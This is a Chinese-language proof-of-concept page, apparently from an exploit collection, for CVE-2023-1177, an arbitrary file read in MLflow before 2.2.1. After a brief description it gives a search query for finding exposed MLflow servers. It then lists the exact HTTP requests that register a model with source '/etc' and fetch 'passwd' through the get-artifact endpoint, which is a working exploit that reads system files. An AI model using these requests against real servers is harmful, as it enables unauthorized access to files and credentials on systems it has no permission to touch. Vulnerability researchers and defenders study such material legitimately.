Awesome-POC/Web应用漏洞/MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177.md

51 lines
1.3 KiB
Markdown
Raw Normal View History

2023-04-17 10:09:40 +08:00
# MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177
## 漏洞描述
使用 MLflow 模型注册表托管 MLflow 开源项目的用户 mlflow server或者 mlflow ui使用早于 MLflow 2.2.1 的 MLflow 版本的命令如果不限制谁可以查询其服务器(例如,通过使用云 VPC、入站请求的 IP 白名单或身份验证 /授权中间件)。
此问题仅影响运行 mlflow server和 mlflow ui命令。 不使用的集成 mlflow server或者 mlflow ui不受影响 例如Azure Machine Learning 上的 Databricks Managed MLflow 产品和 MLflow 不使用这些命令,并且不会以任何方式受到这些漏洞的影响。
## 漏洞影响
```
MLflow < 2.2.1
```
2023-08-28 15:55:36 +08:00
## 网络测绘
2023-04-17 10:09:40 +08:00
```
app.name="MLflow"
```
## 漏洞复现
登陆页面
![image-20230417093814404](images/image-20230417093814404.png)
验证POC
```
POST /ajax-api/2.0/mlflow/registered-models/create
Content-Type: application/json
{"name": "testfile"}
```
![image-20230417093836998](images/image-20230417093836998.png)
```
POST /ajax-api/2.0/mlflow/model-versions/create
Content-Type: application/json
{"name": "testfile", "source": "/etc"}
```
![image-20230417093851779](images/image-20230417093851779.png)
```
/model-versions/get-artifact?path=passwd&name=testfile&version=1
```
![image-20230417093907298](images/image-20230417093907298.png)